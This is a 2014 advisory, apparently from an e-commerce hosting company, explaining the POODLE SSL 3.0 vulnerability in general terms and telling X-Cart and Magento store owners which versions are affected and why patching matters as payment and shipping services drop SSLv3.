Poodle Vulnerability - X-Cart, Magento & Hosting Updates

  • November 11, 2014 by Alex Skorohodov

Google researchers have found a severe flaw in an obsolete but still used encryption software, which could be exploited to steal sensitive data—and the fix could break the Web for users of older web browsers.

The flaw in SSL 3.0 is more than 15 years old but is still used by modern web browsers and servers. SSL stands for “Secure Sockets Layer,” which encrypts data between a client and server and secures most data sent over the Internet.Web browsers are designed to use newer versions of SSL or TLS (Transport Layer Security), but most browsers will accommodate SSL 3.0 if that’s all that a server can do on the other end.

The POODLE attack can force a connection to “fallback” to SSL 3.0, where it is then possible to steal cookies, which are small data files that enable persistent access to an online service. If stolen, a cookie could allow an attacker access to someone’s Web-based email account, for example.

An attacker would have to control the network a victim is connected to in order to conduct this kind of man-in-the-middle attack. That might be possible in a public area, such as over a Wi-Fi network in an airport.

The Kosmos response

But as always, we take every bug very seriously and our engineering team was immediately on it and implemented the following measures as of Oct-20th-2014:

·         We have removed SSL 3.0 on all of our servers. 

·         If you are connecting to a third party application (Authorize.net AIM, Pay Pay Pro, UPS, Fedex, Avalara, etc) today these platforms and 1000’s more, are also discontinuing support for SSL 3.0.

 

This information is relevant for you if you're using any eCommerce software application. 

 

Affected X-cart versions: 4.2.2 - 4.6.4 of all editions (Gold, GoldPlus, Platinum, Pro) 

 

NOT affected:  4.6.5 (the latest currently) ; all versions of X-Cart 5.x 

 

 

Magento & Poodle

 

For Magento, you will also have to apply the appropriate patches. 

 

Magento users, See Magento forum post regarding the Poodle virus here:

http://magento.stackexchange.com/questions/40282/how-to-manage-the-ssl3-poodle-vulnerability

 

Applying these patches is a must of you use:

·  PayPal Advanced;

·  UPS;

·  AuthorizeNet - CIM (in older X-Cart versions through 4.4.5).

The aforementioned services have already informed about the intention to disable the support of SSLv3 because of POODLE vulnerability (read more about it in the very end of this email). The timeframes differ, but once it happens, the current integration will stop working. It means that to continue using their services you must patch your store, the sooner - the better.

I don't use the above, do I need the patch?
Applying these patches is strongly recommended in any case, if you’re using a 3rd party application to send and receive any data then YES.  Even if your store is not using the services listed above,  it may be using some other services that are also planning changes to their platforms and implementing security patches.

What the X-cart patch does:
These patches provide updates for your HTTPS modules and help to avoid possible problems with https requests sent by your store to various services. The integrations with these services (including UPS, PayPal Advanced, Authorize.Net-CIM, but probably not limited to this list) may stop working in the nearest future when these services remove the support for the outdated and vulnerable SSLv3 protocol.

 

How long does it take to implement the X-cart patch?
These patches normally take an hour to update. 


See Poodle Article here:

http://www.pcworld.com/article/2834015/security-experts-warn-of-poodle-attack-against-ssl-30.htmlX-cart